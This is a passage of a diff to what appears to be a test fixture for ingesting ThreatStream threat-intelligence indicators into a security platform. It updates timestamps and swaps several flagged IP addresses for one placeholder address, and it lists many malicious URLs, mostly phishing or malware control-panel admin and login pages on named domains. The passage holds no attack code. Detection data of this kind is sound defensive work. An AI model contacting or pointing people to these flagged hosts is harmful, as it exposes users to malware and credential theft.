[ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 84.38.180.229", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime", "modified": "2020-02-21T02:52:34.992Z", "valid_from": "2020-02-21T02:52:34.992Z", @@ -25315,12 +25315,12 @@ "first_seen": "2020-02-21T02:52:34.992Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "84.38.180.229" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388422359Z", - "original": "{\"created\":\"2020-02-21T02:52:34.992Z\",\"description\":\"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--097b92f4-6865-49db-8e59-2a89df364749\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-21T02:52:34.992Z\",\"name\":\"mal_ip: 84.38.180.229\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '84.38.180.229']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:34.992Z\"}", + "ingested": "2021-12-13T08:38:40.025841Z", + "original": "{\"created\":\"2020-02-21T02:52:34.992Z\",\"description\":\"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--097b92f4-6865-49db-8e59-2a89df364749\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-21T02:52:34.992Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:34.992Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25371,7 +25371,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388426777Z", + "ingested": "2021-12-13T08:38:40.025846100Z", "original": "{\"created\":\"2020-02-21T02:52:35.038Z\",\"description\":\"TS ID: 55333174442; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--03ea9edc-6654-4287-b452-988c85380295\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-21T02:52:35.038Z\",\"name\":\"mal_url: http://jusper.zzz.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jusper.zzz.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:35.038Z\"}", "category": "threat", "type": "indicator", @@ -25423,7 +25423,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388431175Z", + "ingested": "2021-12-13T08:38:40.025850900Z", "original": "{\"created\":\"2020-02-21T02:52:38.593Z\",\"description\":\"TS ID: 55333174440; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--99f64515-7513-4764-b278-987c5df8484b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-21T02:52:38.593Z\",\"name\":\"mal_url: http://azur.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://azur.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:38.593Z\"}", "category": "threat", "type": "indicator", @@ -25474,7 +25474,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388435544Z", + "ingested": "2021-12-13T08:38:40.025855Z", "original": "{\"created\":\"2020-02-21T02:53:25.758Z\",\"description\":\"TS ID: 55333174450; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--afdd7c21-d8c6-419e-84be-5c8b2ce1a829\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-21T02:53:25.758Z\",\"name\":\"mal_url: http://d98527ix.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://d98527ix.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:25.758Z\"}", "category": "threat", "type": "indicator", @@ -25526,7 +25526,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388440302Z", + "ingested": "2021-12-13T08:38:40.025859200Z", "original": "{\"created\":\"2020-02-21T02:53:31.865Z\",\"description\":\"TS ID: 55333174452; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--858c680e-7b33-4345-b23c-bbc2a1efb9e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-21T02:53:31.865Z\",\"name\":\"mal_url: http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:31.865Z\"}", "category": "threat", "type": "indicator", @@ -25578,7 +25578,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388444641Z", + "ingested": "2021-12-13T08:38:40.025862500Z", "original": "{\"created\":\"2020-02-21T02:53:31.9Z\",\"description\":\"TS ID: 55333174443; iType: mal_url; State: active; Org: Fanavari Server Pars Argham Company Gostar Ltd.; Source: CyberCrime\",\"id\":\"indicator--4a97fc3d-210e-4367-ad04-f1b966433a32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-21T02:53:31.9Z\",\"name\":\"mal_url: http://perca.ir/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://perca.ir/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:31.9Z\"}", "category": "threat", "type": "indicator", @@ -25630,7 +25630,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388449109Z", + "ingested": "2021-12-13T08:38:40.025867400Z", "original": "{\"created\":\"2020-02-21T02:53:40.48Z\",\"description\":\"TS ID: 55333174451; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--51994ab0-1f97-4bcb-9f24-9fcd3d2364aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-21T02:53:40.48Z\",\"name\":\"mal_url: http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:40.48Z\"}", "category": "threat", "type": "indicator", @@ -25682,7 +25682,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388453477Z", + "ingested": "2021-12-13T08:38:40.025873900Z", "original": "{\"created\":\"2020-02-21T02:53:42.327Z\",\"description\":\"TS ID: 55333174456; iType: mal_url; State: active; Org: WebHS; Source: CyberCrime\",\"id\":\"indicator--c9d733d6-25c7-4306-9246-c08194e3073a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-21T02:53:42.327Z\",\"name\":\"mal_url: http://livdecor.pt/ali/Panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://livdecor.pt/ali/Panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:42.327Z\"}", "category": "threat", "type": "indicator", @@ -25734,7 +25734,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388457936Z", + "ingested": "2021-12-13T08:38:40.025879800Z", "original": "{\"created\":\"2020-02-21T02:53:58.967Z\",\"description\":\"TS ID: 55333174444; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--1322e66c-185d-4f46-80d4-d5751722d4cf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-21T02:53:58.967Z\",\"name\":\"mal_url: http://liweff.eu/kp/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://liweff.eu/kp/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:58.967Z\"}", "category": "threat", "type": "indicator", @@ -25753,7 +25753,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://82.165.18.207/panel/admin.php", + "name": "mal_url: http://89.160.20.156/panel/admin.php", "description": "TS ID: 55333174436; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime", "modified": "2020-02-21T02:54:44.049Z", "valid_from": "2020-02-21T02:54:44.049Z", @@ -25778,16 +25778,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://82.165.18.207/panel/admin.php", + "original": "http://89.160.20.156/panel/admin.php", "scheme": "http", - "domain": "82.165.18.207", - "full": "http://82.165.18.207/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388462224Z", - "original": "{\"created\":\"2020-02-21T02:54:44.049Z\",\"description\":\"TS ID: 55333174436; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-21T02:54:44.049Z\",\"name\":\"mal_url: http://82.165.18.207/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://82.165.18.207/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.049Z\"}", + "ingested": "2021-12-13T08:38:40.025886700Z", + "original": "{\"created\":\"2020-02-21T02:54:44.049Z\",\"description\":\"TS ID: 55333174436; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-21T02:54:44.049Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.049Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25805,7 +25805,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.90.59.42", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime", "modified": "2020-02-21T02:54:44.075Z", "valid_from": "2020-02-21T02:54:44.075Z", @@ -25827,12 +25827,12 @@ "first_seen": "2020-02-21T02:54:44.075Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.90.59.42" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388467283Z", - "original": "{\"created\":\"2020-02-21T02:54:44.075Z\",\"description\":\"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime\",\"id\":\"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-02-21T02:54:44.075Z\",\"name\":\"mal_ip: 185.90.59.42\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.90.59.42']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.075Z\"}", + "ingested": "2021-12-13T08:38:40.025893400Z", + "original": "{\"created\":\"2020-02-21T02:54:44.075Z\",\"description\":\"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime\",\"id\":\"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-02-21T02:54:44.075Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.075Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25883,7 +25883,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388472613Z", + "ingested": "2021-12-13T08:38:40.025900100Z", "original": "{\"created\":\"2020-02-22T02:52:52.6Z\",\"description\":\"TS ID: 55335562485; iType: mal_url; State: active; Org: PDR; Source: CyberCrime\",\"id\":\"indicator--92dd4ff2-7072-4262-b47d-b04cae8480e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-22T02:52:52.6Z\",\"name\":\"mal_url: http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:52.6Z\"}", "category": "threat", "type": "indicator", @@ -25935,7 +25935,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388479797Z", + "ingested": "2021-12-13T08:38:40.025906700Z", "original": "{\"created\":\"2020-02-22T02:52:53.322Z\",\"description\":\"TS ID: 55335562462; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--122f6e46-781f-4d00-8247-6cf4047b0c9f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:52:53.322Z\",\"name\":\"mal_url: http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.322Z\"}", "category": "threat", "type": "indicator", @@ -25987,7 +25987,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388484535Z", + "ingested": "2021-12-13T08:38:40.025913700Z", "original": "{\"created\":\"2020-02-22T02:52:53.756Z\",\"description\":\"TS ID: 55335562495; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--d5b42516-dfa2-499d-bc2b-c5c10617e7c9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:52:53.756Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/frega/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.756Z\"}", "category": "threat", "type": "indicator", @@ -26039,7 +26039,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388489204Z", + "ingested": "2021-12-13T08:38:40.025920400Z", "original": "{\"created\":\"2020-02-22T02:52:53.779Z\",\"description\":\"TS ID: 55335562482; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--0668db3a-adb5-4e2e-b8f2-18e3870e2d7c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-22T02:52:53.779Z\",\"name\":\"mal_url: http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.779Z\"}", "category": "threat", "type": "indicator", @@ -26058,7 +26058,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://86.106.93.103/mpdu/index.php", + "name": "mal_url: http://89.160.20.156/mpdu/index.php", "description": "TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime", "modified": "2020-02-22T02:52:59.853Z", "valid_from": "2020-02-22T02:52:59.853Z", @@ -26083,16 +26083,16 @@ "url": { "path": "/mpdu/index.php", "extension": "php", - "original": "http://86.106.93.103/mpdu/index.php", + "original": "http://89.160.20.156/mpdu/index.php", "scheme": "http", - "domain": "86.106.93.103", - "full": "http://86.106.93.103/mpdu/index.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/mpdu/index.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388493492Z", - "original": "{\"created\":\"2020-02-22T02:52:59.853Z\",\"description\":\"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime\",\"id\":\"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-22T02:52:59.853Z\",\"name\":\"mal_url: http://86.106.93.103/mpdu/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://86.106.93.103/mpdu/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:59.853Z\"}", + "ingested": "2021-12-13T08:38:40.025927100Z", + "original": "{\"created\":\"2020-02-22T02:52:59.853Z\",\"description\":\"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime\",\"id\":\"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-22T02:52:59.853Z\",\"name\":\"mal_url: http://89.160.20.156/mpdu/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/mpdu/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:59.853Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26110,7 +26110,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 95.142.44.87", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime", "modified": "2020-02-22T02:53:10.018Z", "valid_from": "2020-02-22T02:53:10.018Z", @@ -26132,12 +26132,12 @@ "first_seen": "2020-02-22T02:53:10.018Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "95.142.44.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388497971Z", - "original": "{\"created\":\"2020-02-22T02:53:10.018Z\",\"description\":\"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-22T02:53:10.018Z\",\"name\":\"mal_ip: 95.142.44.87\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '95.142.44.87']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:10.018Z\"}", + "ingested": "2021-12-13T08:38:40.025933600Z", + "original": "{\"created\":\"2020-02-22T02:53:10.018Z\",\"description\":\"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-22T02:53:10.018Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:10.018Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26188,7 +26188,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388502129Z", + "ingested": "2021-12-13T08:38:40.025940400Z", "original": "{\"created\":\"2020-02-22T02:53:11.62Z\",\"description\":\"TS ID: 55335562491; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--2218c7b6-3e94-4885-9a70-1f724d8453cc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-22T02:53:11.62Z\",\"name\":\"mal_url: http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:11.62Z\"}", "category": "threat", "type": "indicator", @@ -26240,7 +26240,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388506477Z", + "ingested": "2021-12-13T08:38:40.025947300Z", "original": "{\"created\":\"2020-02-22T02:53:34.685Z\",\"description\":\"TS ID: 55335562511; iType: mal_url; State: active; Org: T-Mobile Czech Republic; Source: CyberCrime\",\"id\":\"indicator--773fabfe-63b5-4681-8189-4dffad1747fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-46\"],\"modified\":\"2020-02-22T02:53:34.685Z\",\"name\":\"mal_url: http://ccilfov.ro/css/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ccilfov.ro/css/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.685Z\"}", "category": "threat", "type": "indicator", @@ -26259,7 +26259,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 66.172.27.221", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime", "modified": "2020-02-22T02:53:34.733Z", "valid_from": "2020-02-22T02:53:34.733Z", @@ -26281,12 +26281,12 @@ "first_seen": "2020-02-22T02:53:34.733Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "66.172.27.221" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388510504Z", - "original": "{\"created\":\"2020-02-22T02:53:34.733Z\",\"description\":\"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime\",\"id\":\"indicator--5e32213f-5daa-4181-a108-0fc58482adcb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:53:34.733Z\",\"name\":\"mal_ip: 66.172.27.221\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '66.172.27.221']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.733Z\"}", + "ingested": "2021-12-13T08:38:40.025954Z", + "original": "{\"created\":\"2020-02-22T02:53:34.733Z\",\"description\":\"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime\",\"id\":\"indicator--5e32213f-5daa-4181-a108-0fc58482adcb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:53:34.733Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.733Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26337,7 +26337,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388514672Z", + "ingested": "2021-12-13T08:38:40.025959200Z", "original": "{\"created\":\"2020-02-22T02:53:34.767Z\",\"description\":\"TS ID: 55335562468; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--b07ae083-b56c-48b0-bfdb-6cf786978ce8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:53:34.767Z\",\"name\":\"mal_url: http://nortonlilly.info/zeya/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/zeya/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.767Z\"}", "category": "threat", "type": "indicator", @@ -26389,7 +26389,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388518980Z", + "ingested": "2021-12-13T08:38:40.025962400Z", "original": "{\"created\":\"2020-02-22T02:53:36.179Z\",\"description\":\"TS ID: 55335562472; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--42e0fb49-dd09-4979-a4d0-ff310d14acf8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:53:36.179Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/adaba/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/adaba/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:36.179Z\"}", "category": "threat", "type": "indicator", @@ -26441,7 +26441,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388523258Z", + "ingested": "2021-12-13T08:38:40.025967200Z", "original": "{\"created\":\"2020-02-22T02:53:45.219Z\",\"description\":\"TS ID: 55335562429; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--8d2d349a-763b-406b-ba8c-8ba684058028\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-22T02:53:45.219Z\",\"name\":\"mal_url: http://51.83.200.179/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://51.83.200.179/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:45.219Z\"}", "category": "threat", "type": "indicator", @@ -26493,7 +26493,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388527476Z", + "ingested": "2021-12-13T08:38:40.025972200Z", "original": "{\"created\":\"2020-02-22T02:53:56.922Z\",\"description\":\"TS ID: 55335562488; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--965a2554-cc08-488c-8d81-a29e8402eec1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-22T02:53:56.922Z\",\"name\":\"mal_url: http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:56.922Z\"}", "category": "threat", "type": "indicator", @@ -26545,7 +26545,7 @@ } }, "event": { - "ingested": 